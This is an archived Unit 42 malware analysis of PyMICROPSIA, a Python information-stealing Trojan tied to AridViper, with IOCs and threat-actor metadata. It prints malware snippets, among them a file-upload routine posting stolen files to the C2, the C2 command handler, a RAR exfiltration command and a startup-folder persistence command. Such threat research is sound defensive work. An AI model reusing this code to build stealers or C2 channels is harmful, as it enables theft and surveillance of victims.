{
	"id": "d40455fe-12e6-4bde-808b-f57d2c21aa16",
	"created_at": "2026-04-06T00:12:54.833615Z",
	"updated_at": "2026-04-10T03:33:56.451675Z",
	"deleted_at": null,
	"sha1_hash": "0ac687364c7a585bd646624aba51f26db3e8042e",
	"title": "PyMICROPSIA: New Information-Stealing Trojan from AridViper",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3304866,
	"plain_text": "PyMICROPSIA: New Information-Stealing Trojan from AridViper\r\nBy Unit 42\r\nPublished: 2020-12-14 · Archived: 2026-04-05 12:38:42 UTC\r\nExecutive Summary\r\nUnit 42 researchers have been tracking the threat group AridViper, which has been targeting the Middle Eastern region. As part of this research, a new information-stealing Trojan with relations to the MICROPSIA malware family has been identified, showing that the actor maintains a very active development profile, creating new implants that seek to bypass the defenses of their targets. We have named this new malware family PyMICROPSIA because it is built with Python.\r\nFigure 1 below provides a high-level overview of the capabilities of the PyMICROPSIA malware family and similarities observed with previous AridViper activity. While investigating PyMICROPSIA capabilities, we identified two additional samples hosted in the attacker’s infrastructure, which are downloaded and used by PyMICROPSIA during its deployment. The additional samples provide persistence and keylogging capabilities, which we discuss later.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 1 of 35\r\nFigure 1. PyMICROPSIA overview.\r\nIn this blog, we will detail the functionality and objectives of PyMICROPSIA and analyze its command and control (C2) implementation. We will also highlight the main observations that allow us to attribute PyMICROPSIA to previous AridViper activity.\r\nPalo Alto Networks Next-Generation Firewall customers are protected from the attacks outlined in this blog with WildFire, URL Filtering and DNS Security subscriptions. Customers are also protected with AutoFocus and Cortex XDR.\r\nPyMICROPSIA Analysis\r\nPyMICROPSIA has a rich set of information-stealing and control capabilities, including:\r\nFile uploading.\r\nPayload downloading and execution.\r\nBrowser credential stealing.\r\nClearing browsing history and profiles.\r\nTaking screenshots.\r\nKeylogging.\r\nCompressing RAR files for stolen information.\r\nCollecting process information and killing processes.\r\nCollecting file listing information.\r\nDeleting files.\r\nRebooting machine.\r\nCollecting Outlook .ost file. Killing and disabling Outlook process.\r\nDeleting, creating, compressing and exfiltrating files and folders.\r\nCollecting information from USB drives, including file exfiltration.\r\nAudio recording.\r\nExecuting commands.\r\nImplementation Overview\r\nPyMICROPSIA is an information-stealing Trojan built with Python and made into a Windows executable using PyInstaller.\r\nFigure 2. PyInstaller strings in PyMICROPSIA.\r\nIt implements its main functionality by running a loop, where it initializes different threads and calls several tasks periodically with the intent of collecting information and interacting with the C2 operator.\r\nFigure 3. Main code loop.\r\nThe actor makes use of several interesting Python libraries to achieve its purposes, including both built-in Python libraries and specific packages. Some examples of information-stealing specific libraries are:\r\nPyAudio, for audio stealing capabilities.\r\nmss, for screenshot capabilities.\r\nFigure 4. PyAudio library for audio recording.\r\nFigure 5. mss library for screenshots.\r\nThe usage of Python built-in libraries is expected for multiple purposes, such as interacting with Windows processes, Windows registry, networking, file system and so on.\r\nFigure 6. Windows Registry interaction.\r\nFigure 7. Windows processes interaction.\r\nFor more specific interactions with the Windows operating system, it makes use of libraries such as:\r\nWMI, for interaction with Windows Management Instrumentation.\r\nwin32security and ntsecuritycon, for interaction with the win32security API.\r\nFigure 8. WMI usage for USB interaction.\r\nFigure 9. win32security and ntsecuritycon usage.\r\nAn in-depth analysis of the code and capabilities of PyMICROPSIA can be found in the Appendix.\r\nCommand and Control\r\nPyMICROPSIA implements a simple HTTP POST-based C2 protocol, using different Uniform Resource Identifier (URI) paths and variables during the communication depending on the functionality invoked (full details on the implementation can be found in the Appendix).\r\nThe following table summarizes the URI paths and corresponding functionality in PyMICROPSIA:\r\nPath Method\r\n/zoailloaze/sfuxmiibif/samantha Delete request. Unregister.\r\n/zoailloaze/sfuxmiibif/lashawna Device registration.\r\n/zoailloaze/sfuxmiibif/matheny Send command output data.\r\n/zoailloaze/sfuxmiibif/uiasfvz USB device information.\r\n/zoailloaze/sfuxmiibif/daryl Delete request.\r\n/zoailloaze/sfuxmiibif/qprbudls Download payload.\r\n/zoailloaze/sfuxmiibif/nyrvoz Download URL.\r\n/zoailloaze/sfuxmiibif/hortense1 Upload file.\r\nTable 1. URI paths and corresponding functionality.\r\nIt's also important to note that in the PyMICROPSIA samples analyzed, the C2-related code shows several code branches that will never be executed when responses are processed, likely because the actor is still actively working on the code. Based on the code sections that are reachable, the following table summarizes the commands and actions performed on the victim machine:\r\nCommand Action\r\nLee Register new device.\r\nRenee Delete device.\r\nRapunzel Steal and upload browser credentials to C2.\r\nMulan Collect and upload process list.\r\nSilverman Collect and upload file information in TXT format.\r\nEeyore Delete Firefox profiles and de-register device.\r\nPocahontas Collect and upload compressed file information in JSON detailed format.\r\nInfoCinder Collect and upload information regarding drives in the system.\r\nTable 2. Reachable C2 commands and actions.\r\nIs AridViper Working on New Attack Vectors?\r\nPyMICROPSIA is designed to target Windows operating systems only, but the code contains interesting snippets checking for other operating systems, such as “posix” or “darwin”. This is an interesting finding, as we have not witnessed AridViper targeting these operating systems before, and this could represent a new area the actor is starting to explore.\r\nelse:\r\n    if os.name == 'posix' and sys.platform == 'darwin':\r\n        PathName = os.getenv('HOME') + '/Library/Application Support/Google/Chrome/Default/'\r\n        if os.path.isdir(PathName) == False:\r\n            sys.exit(0)\r\n    elif os.name == 'posix':\r\n        PathName = os.getenv('HOME') + '/.config/google-chrome/Default/'\r\n        if os.path.isdir(PathName) == False:\r\n            sys.exit(0)\r\nreturn PathName\r\nFor now, the code found is very simple, and could be part of a copy and paste effort when building the Python code, but in any case, we plan to keep it on our radar while researching new activity.\r\nAdditional Payloads\r\nDuring the C2 interactions, PyMICROPSIA downloads two additional samples that are dropped and executed on the victim’s system, running additional functionality. These payloads are not Python / PyInstaller based.\r\nKeyLogger functionality\r\nThis is a very interesting case, as the keylogging functionality hasn’t been implemented natively as part of PyMICROPSIA. Instead, the sample downloads a specific payload (see the section on File Download Capabilities in the Appendix for details on how the payload is downloaded).\r\nThe payload is downloaded with filename “MetroIntelGenericUIFram.exe” and has the following SHA-256:\r\n381b1efca980dd744cb8d36ad44783a35d01a321593a4f39a0cdae9c7eeac52f\r\nThe sample implements keylogging capabilities using the GetAsyncKeyState API method:\r\nFigure 10. Keylogger GetAsyncKey() code.\r\nIt has a hardcoded configuration directly related to the directory structure initialized by the main PyMICROPSIA sample, so it needs to be compiled according to it. It needs to run under a specific directory created by PyMICROPSIA (“ModelsControllerLibb”), and will store keystroke information under the “HPFusionManagerDell” folder.\r\nFigure 11. Hardcoded configuration parameters.\r\nThe keylogger drops information into the HPFusionManagerDell directory with the following filename structure and format:\r\nFigure 12. Keylogger output file format.\r\nFigure 13. Keylogger file content structure.\r\nPersistence\r\nPersistence in this malware sample can be achieved via regular methods, such as setting up registry keys, which is done as part of the Python code as follows:\r\nFigure 14. Registry key persistence.\r\nHowever, there is something interesting about persistence in this implementation. The sample downloads another payload from the C2 server (see the File Download Capabilities section for more details). This payload is named “SynLocSynMomentum.exe”, with the following SHA-256:\r\n9c32fdf5af8b86049abd92561b3d281cb9aebf57d2dfef8cc2da59df82dca753\r\nThe sample is executed with specific parameters:\r\nSynLocSynMomentum.exe ModelsControllerLibb ModelsControllerLib\r\nIt sets up persistence via the shortcut .lnk copied to the startup menu. It's striking that this code is run as a separate payload considering the amount of functionality already present in the Python code.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c move \"C:\\Users\\admin\\AppData\\Local\\Temp\\\\ModelsControllerLib.lnk\" \"C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ModelsControllerLib.lnk\"\r\nRelations With Other MICROPSIA Activity\r\nWe unearthed PyMICROPSIA while investigating recent MICROPSIA activity related to the Middle Eastern region, and there are multiple aspects of the malware that link the activity to AridViper, including the following examples.\r\nCode Overlaps\r\nOne of the first things that caught our attention regarding this sample was the C2 implementation and capabilities, which are quite similar to known MICROPSIA samples. For example, see the C2 descriptions in previous research by Radware and Check Point.\r\nAlso, one of the tactics, techniques and procedures (TTPs) observed across MICROPSIA samples is the use of rar.exe to compress data for exfiltration. In this version, rar.exe is downloaded from the C2 infrastructure and used with very similar parameters as observed in previous samples:\r\nk24 = '\"' + Wv + '\\\\*.dot' + '\" '\r\nk25 = '\"' + Wv + '\\\\*.dotx' + '\" '\r\nAllFile = k1 + k2 + k3 + k4 + k5 + k6 + k7 + k8 + k9 + k11 + k12 + k13 + k14 + k15 + k16 + k17 + k18 + k19 + k20 + k21 + k22 + k23 + k24 + k25\r\nAllFiles_Drvi = AllFile\r\nflTDType = AllFiles_Drvi\r\nte = file_D\r\nEn_crpypt2 = 'a -r -ep1 -v2.5m -ta' + te + ' -hp'\r\nEn = '4545933464930447517744759'\r\nmm = chick_Device_Name() + En\r\nnnWithoutdel = En_crpypt2 + mm\r\nsubprocess.call('\"' + Rar_File + '\"' + ' ' + (nnWithoutdel + ' ' + '\"' + Zip_File2 + '_NETWORKWTHDate\"' + ' ' + flTDType), shell=True)\r\nFor example, see how one recent sample of MICROPSIA makes use of rar.exe.\r\nSHA-256: 3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac\r\n\"C:\\Program Files\\WinRAR\\Rar.exe\" a -r -ep1 -v2500k -hpcec6b597e046386f74b807c60ada61a5_d01247a1eaf1c24ffbc851e883e67f9b -ta2020-10-21 \"C:\\ProgramData\\commonlogfiles\\LMth_C\" \"C:\\Users\\admin\\*.xls\" \"C:\\Users\\admin\\*.xlsx\" \"C:\\Users\\admin\\*.doc\" \"C:\\Users\\admin\\*.docx\" \"C:\\Users\\admin\\*.csv\" \"C:\\Users\\admin\\*.pdf\" \"C:\\Users\\admin\\*.ppt\" \"C:\\Users\\admin\\*.pptx\" \"C:\\Users\\admin\\*.odt\" \"C:\\Users\\admin\\*.mdb\" \"C:\\Users\\admin\\*.accdb\" \"C:\\Users\\admin\\*.accde\" \"C:\\Users\\admin\\*.txt\" \"C:\\Users\\admin\\*.rtf\"\r\nC2 Communication Similarity\r\nThe URI path structures observed in multiple MICROPSIA samples follow a similar structure to the ones in the PyMICROPSIA samples. For example, if we look into the same recent MICROPSIA sample, we can observe the random characters and structure of the URI paths.\r\nSHA-256: 3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac\r\nThemes Used\r\nIn the past, we have seen references in MICROPSIA to specific themes when it comes to code and C2 implementation, such as The Big Bang Theory or Game of Thrones, and this new implementation is no different, including multiple references to famous actor names, both in code variables as well as in the infrastructure used, as can be seen in Figures 15 and 16.\r\nFigure 15. MICROPSIA is known for referencing themes in code, such as The Big Bang Theory and Game of Thrones. The reference to the actor Fran Drescher shown above seems in line with previous observations of themes.\r\nFigure 16. MICROPSIA is known for referencing themes in code, such as The Big Bang Theory and Game of Thrones. The reference to the actor Keanu Reeves shown above seems in line with previous observations of themes.\r\nAlso, as described in the Command and Control section, the C2 operations contain a lot of Disney references.\r\nAnother interesting detail is the presence of Arabic comments in the code:\r\nError_Request_Delete('..!!لم يتم ضغط هذا الملف')\r\nThis could be a false flag, but it is another possible link to the regional attribution of this malware sample.\r\nConclusion\r\nAridViper is an active threat group that continues developing new tools as part of their arsenal. PyMICROPSIA shows multiple overlaps with other existing AridViper tools such as MICROPSIA. Also, based on different aspects of PyMICROPSIA that we analyzed, several sections of the malware are still not used, indicating that it is likely a malware family under active development by this actor.\r\nPalo Alto Networks customers are protected from the attacks outlined in this blog in the following ways:\r\nAll known AridViper tools, including MICROPSIA and PyMICROPSIA, have malicious verdicts in WildFire.\r\nAutoFocus customers can track the AridViper actor and its tools.\r\nCortex XDR blocks both PyMICROPSIA and the dropped payloads.\r\nC2 domains have been categorized as Command and Control in URL Filtering and DNS Security.\r\nIndicators of Compromise\r\nPyMICROPSIA Samples\r\n11487246a864ee0edf2c05c5f1489558632fb05536d6a599558853640df8cd78\r\nddaeffb12a944a5f4d47b28affe97c1bc3a613dab32e5b5b426ef249cfc29273\r\n46dae9b27f100703acf5b9fda2d1b063cca2af0d4abeeccc6cd45d12be919531\r\nMICROPSIA Samples\r\nAridViper Infrastructure\r\nAPPENDIX: PyMICROPSIA Malware Analysis\r\nThe following PyMICROPSIA analysis is based on the following sample:\r\nSHA-256: 46dae9b27f100703acf5b9fda2d1b063cca2af0d4abeeccc6cd45d12be919531\r\nMalware Initialization\r\nEnvironment and Configuration\r\nAs part of the malware initialization, it's important to highlight two main aspects of PyMICROPSIA:\r\nCreates multiple folders with different purposes.\r\nDefines a list of C2 servers.\r\nFigure 17. Directory structure during initialization.\r\nThe main purpose for each of the files and folders defined in the initial malware configuration is summarized in the following table:\r\nDirectory Purpose\r\nRar_com_Folder Storage for RAR compressed information.\r\nDevName Storage for RAR compressed information.\r\nDevNameSound Storage for audio recorded files.\r\nDevNameKeyPress Storage for keylogger output information.\r\nMyFolderName Multipurpose folder. Stores configuration, output with information collected, etc.\r\ndownloadNameApp Filename for applications downloaded from the C2.\r\nNameApps Filename for applications downloaded from the C2.\r\nNameAppShurt Filename for shortcut created for persistence.\r\nTable 3. Main purpose of configuration folders and files.\r\nDevice Identifier\r\nDevices are identified based on a combination of computer name, username and a randomly generated code. Once the code is generated, it’s stored under the multipurpose folder “MyFolderName”.\r\nFigure 18. Initialization of device name.\r\nThis identifier function will be used during C2 communications to keep track of the target.\r\nC2 Selection\r\nFrom a network perspective, the malware picks up a C2 server from the configured list based on a connectivity test via a POST request to a specific path:\r\nFigure 19. Network C2 selection.\r\nIt then stores the resulting selected domain under the “MyFolderName” multipurpose folder.\r\nFigure 20. Selected domain configuration storage.\r\nMain Activity Loop\r\nOnce the initial setup is complete, the malware capabilities start by entering into a loop (see Figure 3) where:\r\nSeveral independent threads for audio recording and file uploading are started.\r\nSpecific tasks are run periodically, covering the following main areas: persistence, keylogging, screenshots and interaction with the C2 operator.\r\nC2 Implementation\r\nProtocol Implementation\r\nThe protocol implemented is simple. Messages are sent via HTTP POST requests, using different URI paths and variables depending on the functionality invoked.\r\nFor example, when a file is uploaded, an HTTP POST request is built as follows:\r\ndef Upload_File(type, path, FranDrescher, NB):\r\n    if not os.path.exists(path):\r\n        return True\r\n    url = FranDrescher + '/zoailloaze/sfuxmiibif/hortense1'\r\n    datei_hochladen = open(path, 'rb')\r\n    files = {'terrell': datei_hochladen}\r\n    status = False\r\n    while not status:\r\n        try:\r\n            ur = requests.post(url, files=files, data={'beau': name_device + ';' + str(NB), 'type': type, 'FComp': str(NumComPers())})\r\n            if ur.text == 'true':\r\n                status = True\r\n                datei_hochladen.close()\r\n                os.remove(path)\r\nThis request contains:\r\nURI Path: '/zoailloaze/sfuxmiibif/hortense1'\r\nMultipart encoded files, under the “terrell” variable.\r\nForm-encoded data, using ‘beau’, ‘type’ and ‘FComp’ variables.\r\nSome parameters can contain multiple components, such as ‘beau’ in this case, and they are split with the use of ‘;’.\r\nWhen responses are received, if they contain operations to execute, they are sent via strings with components split with ‘;’ as delimiter. For example, the following code snippet shows the communication with the C2 operator and how it treats the response (only some interesting portions are shown for brevity):\r\nur = requests.post(url, data={'beau': name_device + ';' + str(getLastModDir(4))})\r\nresArr = ur.text\r\nIm_extin = resArr.split(';')[0]\r\nif ur.status_code == 200:\r\n    if resArr == 'Lee':\r\n        register_new_device(FranDrescher)\r\n    elif resArr == 'Melissa':\r\n        pass\r\n    elif resArr == 'Renee':\r\n        status = Delete_Request(Im_extin)\r\n    elif resArr == 'nero':\r\n        pass\r\n    else:\r\n        Im_extintion = resArr.split(';')[1]\r\n        if Im_extintion == 'Rapunzel':\r\n            path = args_parser(MyFolderName)\r\n            status = Upload_File('else', path, FranDrescher, Im_extin)\r\n            if status:\r\n                status = Delete_Request(Im_extin)\r\n            if Im_extintion == 'Gal_Gadot':\r\n                path = Sec_Shot(MyFolderName)\r\n                status = Upload_File('lucretia', path, FranDrescher, Im_extin)\r\n                if status:\r\n                    status = Delete_Request(Im_extin)\r\n...\r\n        if Im_extintion == 'Ed_ONeill':\r\n            F_Out = resArr.split(';')[2]\r\n            src_B = base64ToString(F_Out)\r\n            if src_B == 'delete':\r\n                status = Del_Outlook()\r\n            else:\r\n...\r\n        if Im_extintion == 'groot':\r\n            src_path = resArr.split(';')[2]\r\n            dist_path = resArr.split(';')[3]\r\n            src_B = base64ToString(src_path)\r\n            src_B_D = base64ToString(dist_path)\r\n            if os.path.exists(src_B) and os.path.exists(src_B_D\r\nThe response is split via the ‘;’ delimiter, and depending on the position, contains parameters that can be received in plain text or encoded in base64, depending on each situation.\r\nThe following table summarizes the paths and parameters used during the C2 interactions and their functionality:\r\nPath Method Variables\r\n/zoailloaze/sfuxmiibif/samantha Delete request. Unregister. beau\r\n/zoailloaze/sfuxmiibif/lashawna Device registration. beau\r\n/zoailloaze/sfuxmiibif/matheny Send command output data. beau, terrell\r\n/zoailloaze/sfuxmiibif/uiasfvz USB device information. beau, type\r\n/zoailloaze/sfuxmiibif/daryl Delete request. arturo, beau\r\n/zoailloaze/sfuxmiibif/qprbudls Download payload. beau\r\n/zoailloaze/sfuxmiibif/nyrvoz Download URL. beau\r\n/zoailloaze/sfuxmiibif/hortense1 Upload file. beau, type, FComp, terrell\r\nTable 4. Paths and parameters used during C2 interactions and their functionality.\r\nInteracting with C2 Operator\r\nBased on the main activity loop, there will be a periodic call to the C2 server, and it will begin by sending information regarding the device (device identifier), as well as the last modified time on disk.\r\ndef Chick_Request():\r\n    global FranDrescher\r\n    global WD\r\n    global Wv\r\n    url = FranDrescher + '/zoailloaze/sfuxmiibif/lashawna'\r\n    ur = requests.post(url, data={'beau': name_device + ';' + str(getLastModDir(4))})\r\n    resArr = ur.text\r\n    Im_extin = resArr.split(';')[0]\r\nIt's interesting to see how this captures the latest disk activity date. The code shows that it is incomplete, as in this case, the type is ‘4’, and it will always return the string ‘empty’ instead of any kind of date:\r\ndef getLastModDir(type):\r\n    try:\r\n        c = wmi.WMI()\r\n        Mv = ''\r\n        for drive in c.Win32_LogicalDisk(DriveType=type):\r\n            Mv = drive.Caption\r\n        last_date = ''\r\n        dirpath = Mv\r\n        entries = (os.path.join(dirpath, fn) for fn in os.listdir(dirpath))\r\n        entries = ((os.stat(path), path) for path in entries)\r\n        entries = ((stat[ST_MTIME], path) for stat, path in entries if S_ISREG(stat[ST_MODE]))\r\n        for cdate, path in entries:\r\n            last_date = datetime.datetime.fromtimestamp(cdate)\r\n        if type == 4:\r\n            return 'empty'\r\n        return last_date\r\n    except Exception as e:\r\n        return 'empty'\r\nThere are several examples of implementations like this across the code, showing an incomplete or ongoing implementation, which is a signal that the sample is still under active development by the actor.\r\nAs we mentioned before, the response string is split by its delimiter and the commands and encoded parameters sent by the C2 operator are parsed. As an interesting fact, the commands are full of references to Disney (in the past, we have seen AridViper using variables referencing characters of The Big Bang Theory or Game of Thrones, for example).\r\nFigure 21. C2 commands example.\r\nAnother interesting example of incomplete code is the fact that the code won’t be able to go through all the possible branches and functionality in the C2 implementation. For example, in the following code snippet, if the code enters into the “Mulan” branch, it won’t enter into the “Vanellope” code block:\r\nif Im_extintion == 'Mulan':\r\n    path = Process_list(MyFolderName)\r\n    status = Upload_File('else', path, FranDrescher, Im_extin)\r\n    if status:\r\n        status = Delete_Request(Im_extin)\r\n    if Im_extintion == 'Mulan_Fire':\r\n        K_process('firefox.exe')\r\n        Compress_File_Rar_WithoutDel2()\r\n        status = Delete_Request(Im_extin)\r\n    if Im_extintion == 'Vanellope':\r\n        path = Get_ImgType(MyFolderName)\r\n        status = Upload_File('else', path, FranDrescher, Im_extin)\r\n        if status:\r\n            status = Delete_Request(Im_extin)\r\n        if Im_extintion == 'Calhoun':\r\n            path = Get_VedioType(MyFolderName)\r\n            status = Upload_File('else', path, FranDrescher, Im_extin)\r\n            if status:\r\n                status = Delete_Request(Im_extin)\r\nThis is another signal of incomplete implementation and possible active development.\r\nA summary of the commands that are reachable by code execution has been provided in Table 2.\r\nInformation-Stealing and Control Capabilities\r\nThis malware sample has a rich set of information-stealing and control capabilities, whether they’re reachable in the current C2 implementation or not. The following sections will detail only some of the most relevant capabilities, in order to provide visibility into how this malware family is implemented.\r\nAudio Recording\r\nAudio recording is achieved with the usage of the pyaudio and wave Python libraries. Data is stored under the “DevNameSound” folder.\r\nFigure 22. Audio recording implementation.\r\nThe recordings are stored in the corresponding folder, and the running threads as well as the operator commands will allow for the retrieval of the information captured.\r\nFile Download Capabilities\r\nThe ability to download files from the C2 is implemented via a POST request to the following URL path:\r\n/zoailloaze/sfuxmiibif/qprbudls\r\nAs part of the POST request, a parameter named “beau” will be used to specify the type of file download. Based on its value, it can download specific payloads as well as given URLs. The code looks as follows:\r\nFigure 23. Download code example.\r\nValue of “beau” Action\r\n‘1’ Download a legitimate version of rar.exe.\r\n‘2’ Download MetroIntelGenericUIFram.exe.\r\n‘3’ Download SynLocSynMomentum.exe.\r\nA given URL Download from any specified URL.\r\nTable 5. Values of “beau” for sample download.\r\nFile Uploading\r\nThe malware sample starts threads that will periodically upload compressed samples located in different folders.\r\nFigure 24. Upload threads initialized by the sample.\r\nFile uploads are performed via POST request to the following path:\r\n/zoailloaze/sfuxmiibif/hortense1\r\nData is specified via a POST parameter, “beau”, that can contain several variables, always delimited with “;”. Files are specified with a POST parameter named “terrell”.\r\nBoth the mentioned threads, as well as the operators via C2 interaction, can invoke upload code. Here is one example of such a method, where the implementation can be observed:\r\nFigure 25. Upload method example.\r\nScreenshot Capabilities\r\nScreenshots are sent to the C2 using Python’s mss library both periodically as well as on demand if the C2 operator sends the appropriate command.\r\nFigure 26. Screenshot capabilities.\r\nFile Gathering Information\r\nThroughout the code, multiple methods oriented toward collecting information can be found. The methods are invoked based on different interactions with the C2 operator, and they give the operators flexibility on what kind of information they want to collect.\r\nFor example, there are generic methods to collect specific folders with different levels of detail, as can be seen in several of the figures below.\r\nFigure 27. Collection of samples under C:\\users and C:\\Documents and Settings.\r\nFigure 28. Detailed collection of samples under several folders of interest in JSON format.\r\nThere are methods to collect information from external drives:\r\nFigure 29. Example of USB information collection.\r\nAs well as other approaches, such as methods that focus on specific file extensions:\r\nFigure 30. Example of collection of file information by specific extension type.\r\nFile Retrieval\r\nOperators have plenty of commands that allow different types of files to be collected from disk. This method of collection is normally accomplished by selecting the target files and using the legitimate RAR utility to compress data that will be uploaded to the C2. The following example shows how the commands focus on specific extensions:\r\nFigure 31. Example of file selection, compression and gathering by extension type.\r\nCommand Execution\r\nThe AridViper operators have the ability to send parameters together with the commands across the C2 interaction. These commands are split by a specific delimiter ‘;’ in this sample, traveling encoded in base64. The sample has different options implemented, allowing the operators very flexible execution of commands such as download and execution of payloads from a given URL, process execution, etc.\r\nFigure 32. URL download and process execution examples.\r\nSource: https://unit42.paloaltonetworks.com/pymicropsia/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/pymicropsia/"
	],
	"report_names": [
		"pymicropsia"
	],
	"threat_actors": [
		{
			"id": "9198aefa-3da6-4605-bb52-923df20a7fce",
			"created_at": "2023-01-06T13:46:38.766848Z",
			"updated_at": "2026-04-10T02:00:03.093153Z",
			"deleted_at": null,
			"main_name": "The Big Bang",
			"aliases": [],
			"source_name": "MISPGALAXY:The Big Bang",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "929d794b-0e1d-4d10-93a6-29408a527cc2",
			"created_at": "2023-01-06T13:46:38.70844Z",
			"updated_at": "2026-04-10T02:00:03.075002Z",
			"deleted_at": null,
			"main_name": "AridViper",
			"aliases": [
				"Desert Falcon",
				"Arid Viper",
				"APT-C-23",
				"Bearded Barbie",
				"Two-tailed Scorpion"
			],
			"source_name": "MISPGALAXY:AridViper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f7d9b02d-d294-422b-adf7-4b3adfac9d9a",
			"created_at": "2022-10-25T16:07:23.392241Z",
			"updated_at": "2026-04-10T02:00:04.577887Z",
			"deleted_at": null,
			"main_name": "The Big Bang",
			"aliases": [],
			"source_name": "ETDA:The Big Bang",
			"tools": [
				"Micropsia"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434374,
	"ts_updated_at": 1775792036,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0ac687364c7a585bd646624aba51f26db3e8042e.pdf",
		"text": "https://archive.orkl.eu/0ac687364c7a585bd646624aba51f26db3e8042e.txt",
		"img": "https://archive.orkl.eu/0ac687364c7a585bd646624aba51f26db3e8042e.jpg"
	}
}